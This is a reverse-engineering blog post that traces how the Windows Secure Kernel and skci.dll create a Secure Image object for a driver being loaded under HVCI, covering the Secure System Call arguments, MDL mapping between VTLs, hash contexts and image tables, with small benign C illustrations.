I want to make clear again - although the process for creating a Secure Image object may start with what we are about to see in this blog post, even after the Secure System Call returns to VTL 0 in order to create the initial object, there is still a “song-and-dance” performed by ntoskrnl.exe, securekernel.exe, and skci.dll. This specific blog does not go over this whole “song-and-dance”. This blog will focus on the initial steps taken to get the object created in the Secure Kernel. In future blogs we will look at what happens after the initial object is created. For now, we will just stick with the initial object creation.

A Tiny Secure System Call Primer

Secure Image object creation begins through a mechanism known as a Secure System Call. Secure System Calls work, at a high level, similarly to traditional system calls:

  1. An untrusted component (NT in this case) needs to access a resource in a privileged component (Secure Kernel in this case)
  2. The privileged component exposes an interface to the untrusted component
  3. The untrusted component packs up information it wants to send to the privileged component
  4. The untrusted component specifies a given “call number” to indicate what kind of resource it needs access to
  5. The privileged component takes all of the information, verifies it, and acts on it

A “traditional” system call results in the emission of a syscall assembly instruction, which performs the work needed to change the current execution context from user-mode to kernel-mode. Once in kernel-mode, the original request reaches a specified dispatch function which is responsible for servicing the request outlined by the System Call Number. A Secure System Call works almost the same in concept (but not necessarily in the technical implementation). Instead of syscall, however, a vmcall instruction is emitted. vmcall is not specific to the Secure Kernel - it is a VMX instruction that allows guest software (in our case, as we know from HVCI, VTL 0 - which is where NT lives - is effectively treated as “the guest”) to make a call into the underlying VM monitor (Hyper-V). In other words, this results in a call into the Secure Kernel from NT.

The NT function nt!VslpEnterIumSecureMode is a wrapper for emitting a vmcall. The thought process can therefore be summed up as this: if a given function in NT invokes nt!VslpEnterIumSecureMode, the caller of said function is (generally speaking) responsible for invoking a Secure System Call.

Although performing dynamic analysis on the Secure Kernel is difficult, one thing to note here is that the order the Secure System Call arguments are packed and shipped to the Secure Kernel is the same order the Secure Kernel will operate on them. So, as an example, the function nt!VslCreateSecureImageSection is one of the many functions in NT that results in a call to nt!VslpEnterIumSecureMode.

The Secure System Call Number, or SSCN, is stored in the RDX register. The R9 register, although not obvious from the screenshot above, is responsible for storing the packed Secure System Call arguments. These arguments are packed in the form of an in-memory structure (defined as a typedef struct, which we will look at later).

On the Secure Kernel side, the function securekernel!IumInvokeSecureService is a very large function which is the “entry point” for Secure System Calls. This contains a large switch/case statement that correlates a given SSCN to a specific dispatch function handler. The exact same order these arguments are packed is the exact same order they will be unpacked and operated on by the Secure Kernel (in the screenshot below, a1 is the address of the structure, and we can see how various offsets are being extracted from the structure, which is due to struct->Member access).
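To make the pack/dispatch/unpack pattern concrete, here is a standalone sketch of the mechanism described above. The structure layout and handler names are illustrative stand-ins (the real definitions are internal to ntoskrnl.exe/securekernel.exe); only the SSCN value 0x19 and the "same order in, same order out" behavior come from the analysis.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical layout of the packed argument structure -- field names are
 * illustrative, not the real Secure Kernel definitions. The key property is
 * that VTL 0 packs fields in a fixed order and VTL 1 reads them back in
 * that exact same order. */
typedef struct _SECURE_CALL_ARGS {
    uint64_t Reserved; /* observed to always be 0 */
    uint64_t Arg1;
    uint64_t Arg2;
    uint64_t Arg3;
} SECURE_CALL_ARGS;

#define SSCN_CREATE_SECURE_IMAGE_SECTION 0x19 /* from the switch/case */

/* Sketch of the dispatch pattern seen in securekernel!IumInvokeSecureService:
 * the SSCN selects a handler, which then unpacks the arguments by offset. */
static int DispatchSecureServiceCall(uint64_t Sscn, SECURE_CALL_ARGS *Args)
{
    switch (Sscn) {
    case SSCN_CREATE_SECURE_IMAGE_SECTION:
        /* would forward Args->Arg1..Arg3 to the Secure Image handler */
        return (Args->Reserved == 0) ? 0 : -1;
    default:
        return -1; /* analogue of a failing NTSTATUS for unknown SSCNs */
    }
}
```

The point of the sketch is only the shape of the interface: a single entry point, a call number, and a caller-packed structure whose layout both sides must agree on.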

Now that we have a bit of an understanding here, let’s move on to see how the Secure System Call mechanism is used to help Secure Kernel create a Secure Image object!

SECURE_IMAGE (Non-Comprehensive!) Creation Overview

Although by no means is this a surefire way to identify this data, a method that could be employed to locate the functionality for creating Secure Image objects is to just search for terms like SecureImage in the Secure Kernel symbols. Within the call to securekernel!SkmmCreateSecureImageSection we see a call to an externally-imported function, skci!SkciCreateSecureImage.

This means it is highly likely that securekernel!SkmmCreateSecureImageSection is responsible for accepting some parameters surrounding Secure Image object creation and forwarding them on to skci!SkciCreateSecureImage. Focusing our attention on securekernel!SkmmCreateSecureImageSection, we can see that this functionality is triggered through a Secure System Call with an SSCN of 0x19 (the screenshot below is from the securekernel!IumInvokeSecureService Secure System Call dispatch function).

Again, by no means is this correct in all cases, but I have noticed that most of the time, when a Secure System Call is issued from ntoskrnl.exe, the corresponding “lowest-level function” responsible for invoking nt!VslpEnterIumSecureMode has a similar name to the associated dispatch function in securekernel.exe which handles the Secure System Call. Luckily this applies here, and the function which issues the SSCN of 0x19 is nt!VslCreateSecureImageSection.

Based on the call stack here, we can see that when a new section object is created for a target driver image being loaded, the ci.dll module is dispatched in order to determine if the image is compatible with HVCI (if it isn’t, STATUS_INVALID_IMAGE_HASH is returned). Examining the parameters of the Secure System Call reveals the following.

Note that at several points I will have restarted the machine the analysis was performed on and due to KASLR the addresses will change. I will provide enough context in the post to overcome this obstacle.

With Secure System Calls, the first parameter seems to always be 0 and/or reserved. This means the arguments to create a Secure Image object are packed as follows.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID VirtualAddress;
    PVOID PageFrameNumber;
    bool UnknownBool;
    ULONG UnknownUlong;
    ULONG UnknownUlong1;
} SECURE_IMAGE_CREATE_ARGS;

As a small point of contention, I know the page frame number is such because I am used to looking into memory operations that involve both physical and virtual addresses. Any time I am dealing with a lower-level concept, like loading a driver into memory, and I see a ULONG-sized value paired with a virtual address, I assume it could be a PFN - and I assume it even more strongly when the value is not page-aligned. A physical address is simply (page frame number * 0x1000), plus any potential offset. Since the value does not end in 0 or 00, this tells me it is a page frame number rather than a physical address. This is not a guaranteed method, but I will show how I validated it below.
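The PFN-to-physical-address arithmetic above is simple enough to sketch directly (the function name is mine; the math is standard for 4KB pages):

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000ULL
#define PAGE_MASK (PAGE_SIZE - 1)

/* A physical address is (PFN * PAGE_SIZE) plus the byte offset into
 * the page. */
static uint64_t PfnToPhysical(uint64_t PageFrameNumber, uint64_t ByteOffset)
{
    return (PageFrameNumber * PAGE_SIZE) + (ByteOffset & PAGE_MASK);
}
```

This is also why an unaligned raw value reads as a PFN: multiplying any PFN by 0x1000 always produces an address ending in 0x000.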

At first, I was pretty stuck on what this first virtual address was used for. We previously saw the call stack responsible for invoking nt!VslCreateSecureImageSection. If you trace execution in IDA, however, you will quickly see this call stack is a bit convoluted - most of the functions are invoked via function pointers passed as input parameters from other functions, which makes tracing the arguments difficult. Fortunately, I saw that this virtual address was used in a call to securekernel!SkmmMapDataTransfer almost immediately within the Secure System Call handler function (securekernel!SkmmCreateSecureImageSection). Note that although the IDA output is annotated a bit with additional information, we will get to that shortly.

It seems this function is actually publicly documented thanks to Saar Amar and Daniel King’s BlackHat talk! This reveals to us that the first argument is an MDL (Memory Descriptor List), while the second parameter, PageFrameNumber, is a page frame number whose use we don’t yet know.

According to the talk, securekernel.exe tends to use MDLs, which are provided by VTL 0, for cases where data may need to be accessed by VTL 1. By no means is this an MDL internals post, but I will give a quick overview. An MDL (nt!_MDL) is effectively a fixed-size header which is prepended to a variable-length array of page frame numbers (PFNs). Virtual memory, as we know, is contiguous. The normal size of a page on Windows is 4096 (0x1000) bytes. Using a contrived example (not taking into account any optimizations, etc.), let’s say a piece of malware allocated 0x2000 bytes of memory and stored shellcode in that same allocation. We could expect the layout of memory to look as follows.

We can see in this example the shellcode spans the virtual pages 0x1ad2000 and 0x1ad3000. However, this is the virtual location, which is contiguous. In the next example, the reality of the situation creeps in as the physical pages which back the shellcode are in two separate locations.

An MDL would be used in this case to describe the physical layout of the memory of a virtual memory region. The MDL is used to say “hey I have this contiguous buffer in virtual memory, but here are the physical non-contiguous page(s) which describe this contiguous range of virtual memory”.

MDLs are also typically used for direct memory access (DMA) operations. DMA operations don’t have the luxury of much verification, because they need to access data quickly (think UDP vs TCP). Because of this, an MDL is used: it typically first locks the described memory range into memory so that the DMA operation never accesses invalid memory.
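The bookkeeping an MDL performs starts with a simple question: how many PFN array entries does a given virtual range need? The following standalone sketch mirrors the arithmetic of the WDK's ADDRESS_AND_SIZE_TO_SPAN_PAGES macro (this is my illustration, not Secure Kernel code):

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000ULL

/* Number of physical pages needed to describe a virtual range: the offset
 * of the start address within its page plus the byte count, rounded up to
 * whole pages. */
static uint64_t SpanPages(uint64_t Va, uint64_t ByteCount)
{
    uint64_t offset = Va & (PAGE_SIZE - 1);
    return (offset + ByteCount + PAGE_SIZE - 1) / PAGE_SIZE;
}
```

For the contrived shellcode example above, a 0x2000-byte page-aligned allocation spans exactly two pages - and thus two PFN entries - while the same size starting mid-page would span three.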

One of the main features of an MDL is that it allows multiple mappings of the virtual address range a given MDL describes (StartVa is the beginning of the virtual address range the MDL describes). For instance, consider an MDL with the following layout: a user-mode buffer is described by the MDL’s StartVa. As we know, user-mode addresses are only valid within the process context in which they reside (the address space is per-process, based on the page table directory loaded into the CR3 register). Let’s say that a driver, running in an arbitrary context, needs to access the information in the user-mode buffer at Mdl->StartVa. If the driver goes to access this address while the process context is processA.exe, but the address was only valid in processB.exe, you are accessing invalid memory and will cause a crash.

An MDL allows you, through the MmGetSystemAddressForMdlSafe API, to actually request that the system map this memory into the system address space, from the non-paged pool. This allows us to access the contents of the user-mode buffer, through a kernel-mode address, in an arbitrary process context.

Now, using that knowledge, we can see that VTL 0 and VTL 1 use MDLs for the exact same reason! We can think of VTL 0 as the “user-mode” portion and VTL 1 as the “kernel-mode” portion, where VTL 0 has an address with data that VTL 1 wants. VTL 1 can take that data (in the form of an MDL) and map it into VTL 1 so it can safely access the contents of memory described by the MDL.

Taking a look back at how the MDL looks, we can see that StartVa, the buffer the MDL describes, is some sort of base address. We can confirm this is actually the base address of an image being loaded because it contains an nt!_IMAGE_DOS_HEADER (0x5a4d is the magic (“MZ”) for a PE file and can be found at the beginning of the image, which is what a kernel image is).
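The check described above amounts to reading the first two bytes at StartVa and comparing them against the documented PE DOS signature. A minimal sketch (function name mine; the 0x5A4D constant is the standard IMAGE_DOS_SIGNATURE value):

```c
#include <assert.h>
#include <stdint.h>

#define IMAGE_DOS_SIGNATURE 0x5A4D /* 'MZ' read as a little-endian uint16_t */

/* The first two bytes of any PE image (and thus of the buffer described by
 * Mdl->StartVa here) must be 'M','Z'. */
static int LooksLikePeImage(const uint8_t *base)
{
    uint16_t magic = (uint16_t)base[0] | ((uint16_t)base[1] << 8);
    return magic == IMAGE_DOS_SIGNATURE;
}
```

Note that on a little-endian machine, the bytes 'M' (0x4D) then 'Z' (0x5A) read back as the 16-bit value 0x5A4D, which is why dumps of the header show 0x5a4d rather than 0x4d5a.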

However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa, we can see quickly that ByteCount tells us only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness) we can actually see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although the StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. Even though the StartVa is aligned like a base address, the fact of the matter is the actual address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to clearly see that the image has only been mapped into memory. It has not been fully loaded - and only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this to be the case with actual data that shows many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first parameter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents of the region described by the MDL (which are the headers).

The first thing that VTL 1 will do is take the MDL we just showed, provided by VTL 0, and create a new MDL in VTL 1 that describes the provided MDL from VTL 0. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, with any remainder in ByteOffset. This is why the VTL 0 MDL’s address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL within the page is set in ByteOffset.
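The split into a page-aligned StartVa and a ByteOffset is just masking, and can be sketched directly (function names are mine; the 0xFFFFFFFFFFFFF000 mask is exactly ~(PAGE_SIZE - 1) for 4KB pages):

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000ULL

/* Page-aligned base of an address: Va & 0xFFFFFFFFFFFFF000. */
static uint64_t PageAlign(uint64_t Va)
{
    return Va & ~(PAGE_SIZE - 1);
}

/* Remainder within the page, stored in the MDL's ByteOffset field. */
static uint64_t ByteOffsetOf(uint64_t Va)
{
    return Va & (PAGE_SIZE - 1);
}
```

Applying both to the same address always reconstructs it: PageAlign(Va) + ByteOffsetOf(Va) == Va.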

Additionally, from the previous image, we can now realize what the first page frame number used in our Secure System Call parameters is used for. This is the PFN which corresponds to the MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical address is simply (page frame number * PAGE_SIZE) + any offset. Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can clearly see that there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that the PFN in the PTE of the VTL 0 MDL aligns!

This MDL, after construction, has StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on the MDL.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks now occur on this new mapping instead of operating directly on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL is created - not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL. This MDL will be an actual copy of the now-verified contents of the VTL 0 MDL. In other words, thirdNewMdl->StartVa = StartAddressOfHeaders (which is the start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see that since VTL 1 has created this new MDL, the page frame number (PFN) of the VTL 0 MDL was provided since a mapping of virtual memory is simply just creating another virtual page which is backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL is mapped into VTL 1 and has now had all of its contents verified. We then return to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This allows VTL 1 to have a memory buffer containing the contents of the image from VTL 0. We can clearly see below that this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory VTL 0 sent in the first place contains a legitimate image, in order to create a securekernel!_SECURE_IMAGE object. It is also at this point that we determine whether we are dealing with the 32-bit or 64-bit architecture.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is fleshed out, a call to an external function, SkciCreateSecureImage, is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know from the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we also don’t know what they are. The last value, I noticed, was consistently the 0x800C constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see that it doesn’t create the object itself; instead, it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function which accepts two parameters - one an input and one an output/return. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of which is 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size, based on the function name and the fact that the actual return value is of type NTSTATUS) is set to 0x20. This effectively tells us that since 0x800C is obviously neither a 0x20-byte value nor a hash itself, it must instead refer to a type of hash, likely associated with an image. In fact, looking at cross-references to this function reveals that skci!CiInitializeCatalogs passes skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning the first parameter actually specifies the hash algorithm.
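As a side note, 0x800C happens to match the documented wincrypt ALG_ID value CALG_SHA_256, which lines up neatly with the 0x20-byte (SHA-256) digest length observed here. A sketch of the kind of mapping skci!HashKGetHashLength appears to implement follows; the non-0x800C entries are my assumptions based on the standard ALG_ID scheme, and the real function returns an NTSTATUS with an output parameter rather than the length directly:

```c
#include <assert.h>
#include <stdint.h>

/* ALG_ID-style constants. 0x800C is the documented CALG_SHA_256 value;
 * the others are the corresponding documented wincrypt values, assumed
 * here to be among the "few constant values" the function checks. */
#define ALG_SHA1    0x8004
#define ALG_SHA_256 0x800C
#define ALG_SHA_384 0x800D
#define ALG_SHA_512 0x800E

/* Map an algorithm identifier to its digest size in bytes, or 0 for an
 * unrecognized value (standing in for a failing NTSTATUS). */
static uint32_t HashLengthForAlgorithm(uint32_t AlgId)
{
    switch (AlgId) {
    case ALG_SHA1:    return 0x14;
    case ALG_SHA_256: return 0x20;
    case ALG_SHA_384: return 0x30;
    case ALG_SHA_512: return 0x40;
    default:          return 0;
    }
}
```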

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the Image Headers (nt!_IMAGE_NT_HEADERS64) headers for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownUlong1 was updated to ImageSize. I wish I had a better way to explain how I identified this, but in reality it was happenstance: while examining the optional headers I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is that a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance to actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure: ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to a generic 0x1c0000000 address instead of the virtual address at which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this, skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which is used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This tells us the “unknown bool” is really an indicator of whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created, but which wouldn’t be available later otherwise.

The reader should know - I asked Andrea a question about this. The answer here is that a file can either be page-hashed or file-hashed signed. Although the bool gates creating the Verification Context, it is more aptly used to describe if a file is file-hashed or page-hashed. If the image is file-hashed signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hash signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask is formed, based on the parameters surrounding the creation of the section object that will back the loaded driver. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this. Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask will finally make its way to ci!CiGetActionsForImage. This call, as the name implies, returns another bitmask based on our 0x40000001 bitmask. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader. This new returned bitmask tells the header validation function what actions to take for validation.

As prior research shows, depending on the bitmask returned, the header validation is going to be done via page hash validation or file hash validation, by supplying a function pointer to the actual validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file hashed. However, we must consider things like a driver being paged out and paged back in. When an image is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously, since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function (since we are dealing with a file-hashed image) does is actually call two functions which are responsible for creating additional contexts - the first is an “Image Hash Context” and the second is a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image - otherwise, file-hashed images would have no way to be verified in the future, as only page hashes are used for verification of the image. Page Hash Contexts are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context, and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over the sections available in the image being processed and capture how many pages make up each section (and, therefore, how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image are stored in the Page Hash Context. Additionally, the Page Hash Context is then allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).
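The page counting that sizes the Page Hash Context can be sketched as follows. This is my standalone illustration of the arithmetic described above, not decompiled skci.dll code, and the SECTION_INFO type is a stand-in carrying only the one IMAGE_SECTION_HEADER field the logic needs:

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE 0x1000u

/* Minimal stand-in for IMAGE_SECTION_HEADER: only SizeOfRawData matters
 * for the page counting. */
typedef struct {
    uint32_t SizeOfRawData;
} SECTION_INFO;

/* Total pages spanned by every section's raw data - the value the Page
 * Hash Context allocation appears to be sized from. */
static uint32_t TotalSectionPages(const SECTION_INFO *sections, uint32_t count)
{
    uint32_t pages = 0;
    for (uint32_t i = 0; i < count; i++)
        pages += (sections[i].SizeOfRawData + PAGE_SIZE - 1) / PAGE_SIZE;
    return pages;
}
```

For example, sections with raw sizes 0x4200, 0x1000, and 0x10 would contribute 5 + 1 + 1 = 7 pages of hash slots.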

After this, the Page Hash Context information is filled out. This begins by only storing the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which contains also the Page Hash and Image Hash Contexts) have been created (but as we know will be updated with more information later), skci!SkciCreateSecureImage will then sort and copy information from the Image Section Headers and store them in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.
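The PointerToRawData + SizeOfRawData computation for the section that ends last in the file is easy to sketch. Since the section headers have just been sorted, the last entry is the maximum; the version below takes the maximum explicitly so it doesn't depend on ordering (my illustration, not the skci!CiGetFileOffsetAfterLastRawSectionData implementation):

```c
#include <assert.h>
#include <stdint.h>

/* Stand-in carrying the two IMAGE_SECTION_HEADER fields the computation
 * needs. */
typedef struct {
    uint32_t PointerToRawData;
    uint32_t SizeOfRawData;
} RAW_SECTION;

/* File offset just past the last section's raw data:
 * max(PointerToRawData + SizeOfRawData) over all sections. */
static uint32_t FileOffsetAfterLastRawSection(const RAW_SECTION *s, uint32_t count)
{
    uint32_t end = 0;
    for (uint32_t i = 0; i < count; i++) {
        uint32_t e = s[i].PointerToRawData + s[i].SizeOfRawData;
        if (e > end)
            end = e;
    }
    return end;
}
```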

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and stores it in the Secure Image Context directly this time. This also means the Secure Image Context is returned by the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which infers that when the MDL is constructed, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the Optional Header. This validates what we mentioned at the beginning of the blog: although the “base address” is used as the first Secure System Call parameter, it could more accurately be referred to as the “headers” of the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables which are used to track threads and NARs (securekernel!SkiThreadTable/securekernel!SkiNarTable). These are “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of the data being unordered, the data is kept ordered, which allows for faster lookups. It supports 0x10000000 (roughly 256 million) entries. Note that these entries are not all allocated at once; they are simply “reserved”, in the sense that entries not in use are not mapped.
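To give a feel for the "reserved but not mapped" idea, here is a toy sparse table: a large logical index space where backing storage is only materialized on first use. This is purely illustrative - the real securekernel table layout and sizes are not modeled here - using a two-level array with lazily allocated buckets:

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define BUCKETS    256
#define PER_BUCKET 256 /* logical capacity: BUCKETS * PER_BUCKET entries */

/* Top level holds only bucket pointers; unused buckets stay NULL, i.e.
 * "reserved" index space with no memory behind it yet. */
typedef struct {
    void **buckets[BUCKETS];
} SPARSE_TABLE;

/* Return a slot for the given index, materializing its bucket on demand. */
static void **SparseTableEntry(SPARSE_TABLE *t, uint32_t index)
{
    uint32_t b = index / PER_BUCKET;
    uint32_t i = index % PER_BUCKET;
    if (b >= BUCKETS)
        return NULL; /* out of the reserved index space */
    if (!t->buckets[b]) /* first touch: allocate this bucket only */
        t->buckets[b] = calloc(PER_BUCKET, sizeof(void *));
    return &t->buckets[b][i];
}
```

Storing an entry at index 300 materializes only bucket 1; bucket 0 and the other 254 buckets remain unmapped, which is the property that lets such a table "support" a huge entry count cheaply.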

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where this Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure. This determines the index into the table where the object is stored. In the case of storing a new entry, on 64-bit, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will be filled out with more and more information. Some of the first data collected is whether the image is already loaded at a valid kernel address. Earlier in the blog we mentioned that Secure Image creation occurs when an image is first mapped, but not loaded. This seems to imply it is possible for a Secure Image to already be loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected are the Virtual Address and Size of the Load Config Data Directory.

The next steps start by determining if the image being loaded is characterized as a DLL (this is technically possible in kernel-mode - for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.
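The 13th bit (counting from 1) of Characteristics corresponds to the documented IMAGE_FILE_DLL flag, 0x2000. The check reduces to a single mask (function name mine):

```c
#include <assert.h>
#include <stdint.h>

/* Documented PE Characteristics flag: bit 13 when counting from 1,
 * i.e. value 0x2000. */
#define IMAGE_FILE_DLL 0x2000

/* The DLL check described above, applied to FileHeader.Characteristics. */
static int ImageIsDll(uint16_t Characteristics)
{
    return (Characteristics & IMAGE_FILE_DLL) != 0;
}
```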

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, for each of the sections in the image, the prototype PTEs for the image are populated (via securekernel!SkmiPopulateImagePrototypes). If you are not familiar: when a memory region is shared between, for example, two processes, an issue arises at the PTE level. A prototype PTE allows the memory manager to easily track pages that are shared between two processes. As Windows Internals, 7th Edition, Part 1, Chapter 5 states - prototype PTEs are created for a pagefile-backed section object when it is first created. The same thing is effectively happening here, but instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel now obtains a pointer to the prototype PTEs.

After this, additional section data and relocation information for the image is captured. The code first checks whether the relocation information is stripped and, if it hasn't been, captures the Image Data Directory associated with relocation information.

Next, each of the present sections is again iterated over, this time to capture important information about each section in a memory allocation stored in the Secure Image object. Specifically, relocation information is being processed. The creation logic first allocates memory to store the Virtual Address page number, the size of the raw data in pages, and a pointer to the raw data for the section header currently being processed. As part of each check, the logic determines whether the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

